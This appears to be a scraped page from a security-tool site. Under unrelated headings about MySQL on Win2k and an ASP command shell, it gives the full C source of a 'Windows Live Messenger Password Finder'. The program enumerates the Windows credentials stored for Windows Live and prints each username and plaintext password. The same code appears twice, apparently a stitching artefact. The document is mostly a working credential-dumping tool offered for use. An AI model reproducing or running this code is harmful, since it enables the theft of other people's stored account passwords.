win2k平台下mysql的默认设置的脆弱性
[ASP-SHELL] Simple CMD exec 
May 4, 2007 11:00 | by
The following tool will try to retrieve the Windows Live Messager's password.
/**
** Windows Live Messenger v8.0 Password Finder for Windows XP & 2003
** (Compiled-VC++ 6.0 SP6, tested on WinXP SP2, Windows Live Messenger
8.0.0812.00)
** - Gregory R. Panakkal
** http://www.crapware.tk/
** http://www.infogreg.com/
**/
#define WIN32_LEAN_AND_MEAN
#include <windows.h>
#include <stdio.h>
#include <tchar.h>
//Following definitions taken from wincred.h
//[available only in Oct 2002 MS Platform SDK / LCC-Win32 Includes]
typedef struct _CREDENTIAL_ATTRIBUTEA {
LPSTR Keyword;
DWORD Flags;
DWORD ValueSize;
LPBYTE Value;
}
CREDENTIAL_ATTRIBUTEA,*PCREDENTIAL_ATTRIBUTEA;
typedef struct _CREDENTIALA {
DWORD Flags;
DWORD Type;
LPSTR TargetName;
LPSTR Comment;
FILETIME LastWritten;
DWORD CredentialBlobSize;
LPBYTE CredentialBlob;
DWORD Persist;
DWORD AttributeCount;
PCREDENTIAL_ATTRIBUTEA Attributes;
LPSTR TargetAlias;
LPSTR UserName;
} CREDENTIALA,*PCREDENTIALA;
typedef CREDENTIALA CREDENTIAL;
typedef PCREDENTIALA PCREDENTIAL;
////////////////////////////////////////////////////////////////////
typedef BOOL (WINAPI *typeCredEnumerate)(LPCTSTR, DWORD, DWORD *,
PCREDENTIAL **);
typedef VOID (WINAPI *typeCredFree)(PVOID);
typeCredEnumerate pfCredEnumerate = NULL;
typeCredFree pfCredFree = NULL;
////////////////////////////////////////////////////////////////////
void showBanner()
{
_tprintf(_T("Windows Live Messenger Password Finder for Windows XP &
2003\n"));
_tprintf(_T(" - Gregory R. Panakkal, http://www.infogreg.com
\n\n"));
}
////////////////////////////////////////////////////////////////////
int main()
{
PCREDENTIAL *CredentialCollection = NULL;
HMODULE hAdvapi32DLL = NULL;
DWORD dwCount = 0;
DWORD dwTempIndex = 0;
BOOL bOK = FALSE;
showBanner();
do
{
hAdvapi32DLL = LoadLibrary(_T("advapi32.dll"));
if(NULL == hAdvapi32DLL)
{
_tprintf(_T("Error loading advapi32.dll\n"));
break;
}
#ifdef _UNICODE
pfCredEnumerate =
(typeCredEnumerate)GetProcAddress(hAdvapi32DLL,
"CredEnumerateW");
#else
pfCredEnumerate =
(typeCredEnumerate)GetProcAddress(hAdvapi32DLL,
"CredEnumerateA");
#endif
pfCredFree = (typeCredFree)GetProcAddress(hAdvapi32DLL,
"CredFree");
if( pfCredEnumerate == NULL||
pfCredFree == NULL )
{
_tprintf(_T("Error loading Cred APIs\n"));
break;
}
//Get an array of 'credential', satisfying the filter
bOK = pfCredEnumerate(
_T("WindowsLive:name=*"),
0,
&dwCount,
&CredentialCollection
);
if(FALSE == bOK)
{
_tprintf(_T("Error enumerating credentials\n"));
break;
}
for(dwTempIndex=0; dwTempIndex<dwCount; dwTempIndex++)
{
_tprintf(
_T("Username : %s\n"),
CredentialCollection[dwTempIndex]->UserName
);
_tprintf(
_T("Password : %s\n\n"),
CredentialCollection[dwTempIndex]->CredentialBlob
);
}
//Free credential collection
pfCredFree(CredentialCollection);
} while(false);
//Free lib
if(NULL != hAdvapi32DLL)
{
FreeLibrary(hAdvapi32DLL);
}
return TRUE;
}
** Windows Live Messenger v8.0 Password Finder for Windows XP & 2003
** (Compiled-VC++ 6.0 SP6, tested on WinXP SP2, Windows Live Messenger
8.0.0812.00)
** - Gregory R. Panakkal
** http://www.crapware.tk/
** http://www.infogreg.com/
**/
#define WIN32_LEAN_AND_MEAN
#include <windows.h>
#include <stdio.h>
#include <tchar.h>
//Following definitions taken from wincred.h
//[available only in Oct 2002 MS Platform SDK / LCC-Win32 Includes]
typedef struct _CREDENTIAL_ATTRIBUTEA {
LPSTR Keyword;
DWORD Flags;
DWORD ValueSize;
LPBYTE Value;
}
CREDENTIAL_ATTRIBUTEA,*PCREDENTIAL_ATTRIBUTEA;
typedef struct _CREDENTIALA {
DWORD Flags;
DWORD Type;
LPSTR TargetName;
LPSTR Comment;
FILETIME LastWritten;
DWORD CredentialBlobSize;
LPBYTE CredentialBlob;
DWORD Persist;
DWORD AttributeCount;
PCREDENTIAL_ATTRIBUTEA Attributes;
LPSTR TargetAlias;
LPSTR UserName;
} CREDENTIALA,*PCREDENTIALA;
typedef CREDENTIALA CREDENTIAL;
typedef PCREDENTIALA PCREDENTIAL;
////////////////////////////////////////////////////////////////////
typedef BOOL (WINAPI *typeCredEnumerate)(LPCTSTR, DWORD, DWORD *,
PCREDENTIAL **);
typedef VOID (WINAPI *typeCredFree)(PVOID);
typeCredEnumerate pfCredEnumerate = NULL;
typeCredFree pfCredFree = NULL;
////////////////////////////////////////////////////////////////////
void showBanner()
{
_tprintf(_T("Windows Live Messenger Password Finder for Windows XP &
2003\n"));
_tprintf(_T(" - Gregory R. Panakkal, http://www.infogreg.com
\n\n"));
}
////////////////////////////////////////////////////////////////////
int main()
{
PCREDENTIAL *CredentialCollection = NULL;
HMODULE hAdvapi32DLL = NULL;
DWORD dwCount = 0;
DWORD dwTempIndex = 0;
BOOL bOK = FALSE;
showBanner();
do
{
hAdvapi32DLL = LoadLibrary(_T("advapi32.dll"));
if(NULL == hAdvapi32DLL)
{
_tprintf(_T("Error loading advapi32.dll\n"));
break;
}
#ifdef _UNICODE
pfCredEnumerate =
(typeCredEnumerate)GetProcAddress(hAdvapi32DLL,
"CredEnumerateW");
#else
pfCredEnumerate =
(typeCredEnumerate)GetProcAddress(hAdvapi32DLL,
"CredEnumerateA");
#endif
pfCredFree = (typeCredFree)GetProcAddress(hAdvapi32DLL,
"CredFree");
if( pfCredEnumerate == NULL||
pfCredFree == NULL )
{
_tprintf(_T("Error loading Cred APIs\n"));
break;
}
//Get an array of 'credential', satisfying the filter
bOK = pfCredEnumerate(
_T("WindowsLive:name=*"),
0,
&dwCount,
&CredentialCollection
);
if(FALSE == bOK)
{
_tprintf(_T("Error enumerating credentials\n"));
break;
}
for(dwTempIndex=0; dwTempIndex<dwCount; dwTempIndex++)
{
_tprintf(
_T("Username : %s\n"),
CredentialCollection[dwTempIndex]->UserName
);
_tprintf(
_T("Password : %s\n\n"),
CredentialCollection[dwTempIndex]->CredentialBlob
);
}
//Free credential collection
pfCredFree(CredentialCollection);
} while(false);
//Free lib
if(NULL != hAdvapi32DLL)
{
FreeLibrary(hAdvapi32DLL);
}
return TRUE;
}
